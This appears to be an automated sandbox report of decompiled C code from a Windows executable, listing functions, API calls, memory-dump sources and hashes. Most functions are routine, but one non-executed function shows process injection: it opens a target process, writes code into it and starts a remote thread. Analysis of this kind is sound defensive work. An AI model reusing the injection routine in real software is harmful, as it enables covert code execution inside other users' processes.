                                                                                                  							_v32 = _t72 & 0x0000ffff;
                                                                                                  							_v8 = 1;
                                                                                                  							goto L25;
                                                                                                  						} else {
                                                                                                  							L14:
                                                                                                  							if(_t101 != 0) {
                                                                                                  								L24:
                                                                                                  								E0040559A( &_v52, _t101);
                                                                                                  								 *((short*)(_v36 + _t101 * 2)) =  *_v28 & 0x0000ffff;
                                                                                                  								_t106 = _a8;
                                                                                                  								_t101 = _t101 + 1;
                                                                                                  								_v12 = _t101;
                                                                                                  								L25:
                                                                                                  								_v24 = 0;
                                                                                                  								goto L26;
                                                                                                  							}
                                                                                                  							if(_t72 == 0x20) {
                                                                                                  								goto L25;
                                                                                                  							}
                                                                                                  							_t104 = _a4 + 0x20;
                                                                                                  							if(_v16 >= 0) {
                                                                                                  								_t110 = _v16;
                                                                                                  								_t82 = _t104[2];
                                                                                                  								if(_t110 != 0xffffffff) {
                                                                                                  									E00404951( &(_t104[1]), _t110, _t104, 4, _t82);
                                                                                                  								} else {
                                                                                                  									free( *_t104);
                                                                                                  								}
                                                                                                  								_t85 = _t110 + 1;
                                                                                                  								if(_t104[3] < _t85) {
                                                                                                  									_t104[3] = _t85;
                                                                                                  								}
                                                                                                  								_t94 = _v20;
                                                                                                  								 *((intOrPtr*)( *_t104 + _t110 * 4)) = _v20;
                                                                                                  							}
                                                                                                  							_t101 = _v12;
                                                                                                  							goto L24;
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						if(_v24 == 0) {
                                                                                                  							E0040559A( &_v52, _t101);
                                                                                                  							_t90 = _v36;
                                                                                                  							 *((short*)(_t90 + _t101 * 2)) = 0;
                                                                                                  							if(_t90 == 0) {
                                                                                                  								_t90 = 0x40c4e8;
                                                                                                  							}
                                                                                                  							E004054DF(_a4, _t94, _t90); // executed
                                                                                                  							_v16 = _v16 + 1;
                                                                                                  							_v24 = 1;
                                                                                                  							_v12 = 0;
                                                                                                  							_t101 = 0;
                                                                                                  						}
                                                                                                  					}
                                                                                                  					L26:
                                                                                                  					_v20 = _v20 + 1;
                                                                                                  					_t68 = _t106 + _v20 * 2;
                                                                                                  					_v28 = _t68;
                                                                                                  				} while ( *_t68 != 0);
                                                                                                  				if(_t101 <= 0) {
                                                                                                  					goto L31;
                                                                                                  				}
                                                                                                  				E0040559A( &_v52, _t101);
                                                                                                  				_t80 = _v36;
                                                                                                  				 *((short*)(_t80 + _t101 * 2)) = 0;
                                                                                                  				if(_t80 == 0) {
                                                                                                  					_t80 = 0x40c4e8;
                                                                                                  				}
                                                                                                  				_t107 = _a4;
                                                                                                  				_t68 = E004054DF(_t107, _t94, _t80);
                                                                                                  				goto L32;
                                                                                                  			}





























                                                                                                  0x004056b5
                                                                                                  0x004056c3
                                                                                                  0x004056c5
                                                                                                  0x004056cc
                                                                                                  0x004056cf
                                                                                                  0x004056d2
                                                                                                  0x004056d5
                                                                                                  0x004056dc
                                                                                                  0x004056df
                                                                                                  0x004056e2
                                                                                                  0x004056e5
                                                                                                  0x004056e8
                                                                                                  0x004056ef
                                                                                                  0x004056f2
                                                                                                  0x004056f7
                                                                                                  0x004056fd
                                                                                                  0x00405832
                                                                                                  0x00405832
                                                                                                  0x00405835
                                                                                                  0x00405835
                                                                                                  0x00405838
                                                                                                  0x0040583e
                                                                                                  0x00405849
                                                                                                  0x00405849
                                                                                                  0x00405703
                                                                                                  0x00405706
                                                                                                  0x00405709
                                                                                                  0x00405710
                                                                                                  0x0040575b
                                                                                                  0x00405766
                                                                                                  0x0040577b
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040577d
                                                                                                  0x00000000
                                                                                                  0x0040577d
                                                                                                  0x0040576b
                                                                                                  0x0040576e
                                                                                                  0x00000000
                                                                                                  0x00405783
                                                                                                  0x00405783
                                                                                                  0x00405785
                                                                                                  0x004057d1
                                                                                                  0x004057dc
                                                                                                  0x004057e4
                                                                                                  0x004057e8
                                                                                                  0x004057eb
                                                                                                  0x004057ec
                                                                                                  0x004057ef
                                                                                                  0x004057ef
                                                                                                  0x00000000
                                                                                                  0x004057ef
                                                                                                  0x0040578b
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405790
                                                                                                  0x00405796
                                                                                                  0x00405798
                                                                                                  0x0040579e
                                                                                                  0x004057a1
                                                                                                  0x004057b4
                                                                                                  0x004057a3
                                                                                                  0x004057a5
                                                                                                  0x004057a5
                                                                                                  0x004057ba
                                                                                                  0x004057c1
                                                                                                  0x004057c3
                                                                                                  0x004057c3
                                                                                                  0x004057c8
                                                                                                  0x004057cb
                                                                                                  0x004057cb
                                                                                                  0x004057ce
                                                                                                  0x00000000
                                                                                                  0x004057ce
                                                                                                  0x00405717
                                                                                                  0x0040571a
                                                                                                  0x00405725
                                                                                                  0x0040572a
                                                                                                  0x0040572f
                                                                                                  0x00405733
                                                                                                  0x00405735
                                                                                                  0x00405735
                                                                                                  0x0040573e
                                                                                                  0x00405743
                                                                                                  0x00405746
                                                                                                  0x0040574d
                                                                                                  0x00405750
                                                                                                  0x00405750
                                                                                                  0x0040571a
                                                                                                  0x004057f2
                                                                                                  0x004057f2
                                                                                                  0x004057f8
                                                                                                  0x004057fe
                                                                                                  0x004057fe
                                                                                                  0x00405809
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405810
                                                                                                  0x00405815
                                                                                                  0x0040581a
                                                                                                  0x0040581e
                                                                                                  0x00405820
                                                                                                  0x00405820
                                                                                                  0x00405825
                                                                                                  0x0040582b
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                    • Part of subcall function 004054B9: free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
                                                                                                    • Part of subcall function 004054B9: free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4
                                                                                                    • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                  • free.MSVCRT(?,00000000,?,00000000), ref: 004057A5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: free
                                                                                                  • String ID: "
                                                                                                  • API String ID: 1294909896-123907689
                                                                                                  • Opcode ID: d3eeb61968f5ac6cc7ddf255b1d7beaa2342315e0b6fe90f5a0d6307f80e1fc2
                                                                                                  • Instruction ID: 1409d80bf75a77decaa3a1a55a0e2bac06d52b88a1a49f7bf6fe6aa810a6aee9
                                                                                                  • Opcode Fuzzy Hash: d3eeb61968f5ac6cc7ddf255b1d7beaa2342315e0b6fe90f5a0d6307f80e1fc2
                                                                                                  • Instruction Fuzzy Hash: 7F511675D00619EBCB20EF99C8805AEB7B5FF44314F50807BE945B7290D738AA42DF99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004054B9(intOrPtr* __esi) {
                                                                                                  
                                                                                                  				free( *(__esi + 0x10));
                                                                                                  				free( *(__esi + 0xc)); // executed
                                                                                                  				 *((intOrPtr*)(__esi)) = 0;
                                                                                                  				 *((intOrPtr*)(__esi + 4)) = 0;
                                                                                                  				 *(__esi + 0xc) = 0;
                                                                                                  				 *(__esi + 0x10) = 0;
                                                                                                  				 *((intOrPtr*)(__esi + 0x1c)) = 0;
                                                                                                  				 *((intOrPtr*)(__esi + 8)) = 0;
                                                                                                  				return 0;
                                                                                                  			}



                                                                                                  0x004054bc
                                                                                                  0x004054c4
                                                                                                  0x004054cd
                                                                                                  0x004054cf
                                                                                                  0x004054d2
                                                                                                  0x004054d5
                                                                                                  0x004054d8
                                                                                                  0x004054db
                                                                                                  0x004054de

                                                                                                  APIs
                                                                                                  • free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
                                                                                                  • free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1294909896-0
                                                                                                  • Opcode ID: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
                                                                                                  • Instruction ID: 7665469e3ee5729aacaba78e143212aa4928b7d925741869fd88885e7d369011
                                                                                                  • Opcode Fuzzy Hash: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
                                                                                                  • Instruction Fuzzy Hash: C2D0A2B1515B018ED7B5DF39E405506BBF1EF083143108D7E90AED2A51E735A5549F48
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                  				signed int _v8;
                                                                                                  				void* _t8;
                                                                                                  				void* _t13;
                                                                                                  
                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                  				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
                                                                                                  				_t13 = _t8;
                                                                                                  				if(_v8 != 0) {
                                                                                                  					FreeLibrary(_v8);
                                                                                                  				}
                                                                                                  				return _t13;
                                                                                                  			}






                                                                                                  0x00408f4c
                                                                                                  0x00408f57
                                                                                                  0x00408f60
                                                                                                  0x00408f62
                                                                                                  0x00408f67
                                                                                                  0x00408f67
                                                                                                  0x00408f71

                                                                                                  APIs
                                                                                                    • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                    • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: CurrentErrorFreeLastLibraryProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 187924719-0
                                                                                                  • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                  • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                                                  • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                  • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 37%
                                                                                                  			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                                                  				void* __esi;
                                                                                                  				intOrPtr* _t6;
                                                                                                  				void* _t8;
                                                                                                  				struct HINSTANCE__** _t10;
                                                                                                  
                                                                                                  				_t10 = __eax;
                                                                                                  				E00409921(__eax);
                                                                                                  				_t6 =  *((intOrPtr*)(_t10 + 0x10));
                                                                                                  				if(_t6 == 0) {
                                                                                                  					return 0;
                                                                                                  				}
                                                                                                  				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
                                                                                                  				return _t8;
                                                                                                  			}







                                                                                                  0x004098fa
                                                                                                  0x004098fc
                                                                                                  0x00409901
                                                                                                  0x00409907
                                                                                                  0x00000000
                                                                                                  0x0040991c
                                                                                                  0x00409918
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$FileModuleName
                                                                                                  • String ID:
                                                                                                  • API String ID: 3859505661-0
                                                                                                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                  • Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
                                                                                                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                  • Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004095DA(signed int* __edi) {
                                                                                                  				void* __esi;
                                                                                                  				struct HINSTANCE__* _t3;
                                                                                                  				signed int* _t7;
                                                                                                  
                                                                                                  				_t7 = __edi;
                                                                                                  				_t3 =  *__edi;
                                                                                                  				if(_t3 != 0) {
                                                                                                  					FreeLibrary(_t3); // executed
                                                                                                  					 *__edi =  *__edi & 0x00000000;
                                                                                                  				}
                                                                                                  				E004099D4( &(_t7[0xa]));
                                                                                                  				return E004099D4( &(_t7[6]));
                                                                                                  			}






                                                                                                  0x004095da
                                                                                                  0x004095da
                                                                                                  0x004095de
                                                                                                  0x004095e1
                                                                                                  0x004095e7
                                                                                                  0x004095e7
                                                                                                  0x004095ee
                                                                                                  0x004095fc

                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: FreeLibrary
                                                                                                  • String ID:
                                                                                                  • API String ID: 3664257935-0
                                                                                                  • Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                  • Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
                                                                                                  • Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                  • Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {
                                                                                                  
                                                                                                  				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
                                                                                                  				return 1;
                                                                                                  			}



                                                                                                  0x0040a3d0
                                                                                                  0x0040a3d9

                                                                                                  APIs
                                                                                                  • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: EnumNamesResource
                                                                                                  • String ID:
                                                                                                  • API String ID: 3334572018-0
                                                                                                  • Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                  • Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
                                                                                                  • Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                  • Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004055D1(void* __eax, signed int* __esi) {
                                                                                                  				void* _t7;
                                                                                                  				signed int* _t9;
                                                                                                  
                                                                                                  				_t9 = __esi;
                                                                                                  				_t7 = __eax;
                                                                                                  				if(__esi[4] != 0) {
                                                                                                  					free(__esi[4]); // executed
                                                                                                  					__esi[4] = __esi[4] & 0x00000000;
                                                                                                  				}
                                                                                                  				_t9[2] = _t9[2] & 0x00000000;
                                                                                                  				 *_t9 =  *_t9 & 0x00000000;
                                                                                                  				return _t7;
                                                                                                  			}





                                                                                                  0x004055d1
                                                                                                  0x004055d1
                                                                                                  0x004055d5
                                                                                                  0x004055da
                                                                                                  0x004055df
                                                                                                  0x004055e3
                                                                                                  0x004055e4
                                                                                                  0x004055e8
                                                                                                  0x004055eb

                                                                                                  APIs
                                                                                                  • free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1294909896-0
                                                                                                  • Opcode ID: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
                                                                                                  • Instruction ID: d9e56b4edb5911b8eb4629cf82416adf3d5ef3fa420fba14bebf6bcebba5d7e5
                                                                                                  • Opcode Fuzzy Hash: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
                                                                                                  • Instruction Fuzzy Hash: FEC00272420B01DBE7355F21D8093A6B3F1FB1032BFA04E6E90A6148E1C7BCA58CCA48
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Non-executed Functions

                                                                                                  C-Code - Quality: 70%
                                                                                                  			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
                                                                                                  				char _v8;
                                                                                                  				long _v12;
                                                                                                  				long _v16;
                                                                                                  				long _v20;
                                                                                                  				intOrPtr _v24;
                                                                                                  				long _v28;
                                                                                                  				char _v564;
                                                                                                  				char _v16950;
                                                                                                  				char _v33336;
                                                                                                  				_Unknown_base(*)()* _v33348;
                                                                                                  				_Unknown_base(*)()* _v33352;
                                                                                                  				void _v33420;
                                                                                                  				void _v33432;
                                                                                                  				void _v33436;
                                                                                                  				intOrPtr _v66756;
                                                                                                  				intOrPtr _v66760;
                                                                                                  				void _v66848;
                                                                                                  				void _v66852;
                                                                                                  				void* __edi;
                                                                                                  				void* _t76;
                                                                                                  				_Unknown_base(*)()* _t84;
                                                                                                  				_Unknown_base(*)()* _t87;
                                                                                                  				void* _t90;
                                                                                                  				signed int _t126;
                                                                                                  				struct HINSTANCE__* _t128;
                                                                                                  				intOrPtr* _t138;
                                                                                                  				void* _t140;
                                                                                                  				void* _t144;
                                                                                                  				void* _t147;
                                                                                                  				void* _t148;
                                                                                                  
                                                                                                  				E0040B550(0x10524, __ecx);
                                                                                                  				_t138 = _a4;
                                                                                                  				_v12 = 0;
                                                                                                  				 *_t138 = 0;
                                                                                                  				_t76 = OpenProcess(0x1f0fff, 0, _a8);
                                                                                                  				_a8 = _t76;
                                                                                                  				if(_t76 == 0) {
                                                                                                  					 *_t138 = GetLastError();
                                                                                                  					L30:
                                                                                                  					return _v12;
                                                                                                  				}
                                                                                                  				_v33436 = 0;
                                                                                                  				memset( &_v33432, 0, 0x8284);
                                                                                                  				_t148 = _t147 + 0xc;
                                                                                                  				_t128 = GetModuleHandleW(L"kernel32.dll");
                                                                                                  				_v8 = 0;
                                                                                                  				E00409C70( &_v8);
                                                                                                  				_push("CreateProcessW");
                                                                                                  				_push(_t128);
                                                                                                  				if(_v8 == 0) {
                                                                                                  					_t84 = GetProcAddress();
                                                                                                  				} else {
                                                                                                  					_t84 = _v8();
                                                                                                  				}
                                                                                                  				_v33352 = _t84;
                                                                                                  				E00409C70( &_v8);
                                                                                                  				_push("GetLastError");
                                                                                                  				_push(_t128);
                                                                                                  				if(_v8 == 0) {
                                                                                                  					_t87 = GetProcAddress();
                                                                                                  				} else {
                                                                                                  					_t87 = _v8();
                                                                                                  				}
                                                                                                  				_t140 = _a28;
                                                                                                  				_v33348 = _t87;
                                                                                                  				if(_t140 != 0) {
                                                                                                  					_t126 = 0x11;
                                                                                                  					memcpy( &_v33420, _t140, _t126 << 2);
                                                                                                  					_t148 = _t148 + 0xc;
                                                                                                  				}
                                                                                                  				_v33420 = 0x44;
                                                                                                  				if(_a16 == 0) {
                                                                                                  					_v33336 = 1;
                                                                                                  				} else {
                                                                                                  					E00404923(0x2000,  &_v33336, _a16);
                                                                                                  				}
                                                                                                  				if(_a12 == 0) {
                                                                                                  					_v16950 = 1;
                                                                                                  				} else {
                                                                                                  					E00404923(0x2000,  &_v16950, _a12);
                                                                                                  				}
                                                                                                  				if(_a24 == 0) {
                                                                                                  					_v564 = 1;
                                                                                                  				} else {
                                                                                                  					E00404923(0x104,  &_v564, _a24);
                                                                                                  				}
                                                                                                  				_v24 = _a20;
                                                                                                  				_v28 = 0;
                                                                                                  				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
                                                                                                  				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
                                                                                                  				_a12 = _t90;
                                                                                                  				if(_a16 == 0 || _t90 == 0) {
                                                                                                  					 *_a4 = GetLastError();
                                                                                                  				} else {
                                                                                                  					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
                                                                                                  					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
                                                                                                  					_v20 = 0;
                                                                                                  					_v16 = 0;
                                                                                                  					_a24 = 0;
                                                                                                  					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
                                                                                                  					_a28 = _t144;
                                                                                                  					if(_t144 == 0) {
                                                                                                  						 *_a4 = GetLastError();
                                                                                                  					} else {
                                                                                                  						ResumeThread(_t144);
                                                                                                  						WaitForSingleObject(_t144, 0x7d0);
                                                                                                  						CloseHandle(_t144);
                                                                                                  					}
                                                                                                  					_v66852 = 0;
                                                                                                  					memset( &_v66848, 0, 0x8284);
                                                                                                  					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
                                                                                                  					VirtualFreeEx(_a8, _a16, 0, 0x8000);
                                                                                                  					VirtualFreeEx(_a8, _a12, 0, 0x8000);
                                                                                                  					if(_a28 != 0) {
                                                                                                  						 *_a4 = _v66756;
                                                                                                  						_v12 = _v66760;
                                                                                                  						if(_a32 != 0) {
                                                                                                  							asm("movsd");
                                                                                                  							asm("movsd");
                                                                                                  							asm("movsd");
                                                                                                  							asm("movsd");
                                                                                                  						}
                                                                                                  					}
                                                                                                  					if(_v20 != 0) {
                                                                                                  						FreeLibrary(_v20);
                                                                                                  					}
                                                                                                  				}
                                                                                                  				goto L30;
                                                                                                  			}

































                                                                                                  0x0040a474
                                                                                                  0x0040a47b
                                                                                                  0x0040a48a
                                                                                                  0x0040a48d
                                                                                                  0x0040a48f
                                                                                                  0x0040a497
                                                                                                  0x0040a49a
                                                                                                  0x0040a6f7
                                                                                                  0x0040a6f9
                                                                                                  0x0040a700
                                                                                                  0x0040a700
                                                                                                  0x0040a4ad
                                                                                                  0x0040a4b3
                                                                                                  0x0040a4b8
                                                                                                  0x0040a4c6
                                                                                                  0x0040a4cc
                                                                                                  0x0040a4cf
                                                                                                  0x0040a4dd
                                                                                                  0x0040a4e2
                                                                                                  0x0040a4e3
                                                                                                  0x0040a4ea
                                                                                                  0x0040a4e5
                                                                                                  0x0040a4e5
                                                                                                  0x0040a4e5
                                                                                                  0x0040a4ec
                                                                                                  0x0040a4f6
                                                                                                  0x0040a4fe
                                                                                                  0x0040a503
                                                                                                  0x0040a504
                                                                                                  0x0040a50b
                                                                                                  0x0040a506
                                                                                                  0x0040a506
                                                                                                  0x0040a506
                                                                                                  0x0040a50d
                                                                                                  0x0040a512
                                                                                                  0x0040a518
                                                                                                  0x0040a51c
                                                                                                  0x0040a523
                                                                                                  0x0040a523
                                                                                                  0x0040a523
                                                                                                  0x0040a528
                                                                                                  0x0040a537
                                                                                                  0x0040a54c
                                                                                                  0x0040a539
                                                                                                  0x0040a544
                                                                                                  0x0040a549
                                                                                                  0x0040a558
                                                                                                  0x0040a56d
                                                                                                  0x0040a55a
                                                                                                  0x0040a565
                                                                                                  0x0040a56a
                                                                                                  0x0040a579
                                                                                                  0x0040a591
                                                                                                  0x0040a57b
                                                                                                  0x0040a589
                                                                                                  0x0040a58e
                                                                                                  0x0040a5b4
                                                                                                  0x0040a5b7
                                                                                                  0x0040a5cc
                                                                                                  0x0040a5cf
                                                                                                  0x0040a5d4
                                                                                                  0x0040a5d7
                                                                                                  0x0040a6ed
                                                                                                  0x0040a5e5
                                                                                                  0x0040a5fa
                                                                                                  0x0040a60b
                                                                                                  0x0040a61a
                                                                                                  0x0040a620
                                                                                                  0x0040a623
                                                                                                  0x0040a62b
                                                                                                  0x0040a62f
                                                                                                  0x0040a632
                                                                                                  0x0040a659
                                                                                                  0x0040a634
                                                                                                  0x0040a635
                                                                                                  0x0040a641
                                                                                                  0x0040a648
                                                                                                  0x0040a648
                                                                                                  0x0040a668
                                                                                                  0x0040a66e
                                                                                                  0x0040a685
                                                                                                  0x0040a69e
                                                                                                  0x0040a6a8
                                                                                                  0x0040a6ad
                                                                                                  0x0040a6bd
                                                                                                  0x0040a6c5
                                                                                                  0x0040a6c8
                                                                                                  0x0040a6d0
                                                                                                  0x0040a6d1
                                                                                                  0x0040a6d2
                                                                                                  0x0040a6d3
                                                                                                  0x0040a6d3
                                                                                                  0x0040a6c8
                                                                                                  0x0040a6d7
                                                                                                  0x0040a6dc
                                                                                                  0x0040a6dc
                                                                                                  0x0040a6d7
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                                                  • memset.MSVCRT ref: 0040A4B3
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
                                                                                                    • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                    • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                    • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
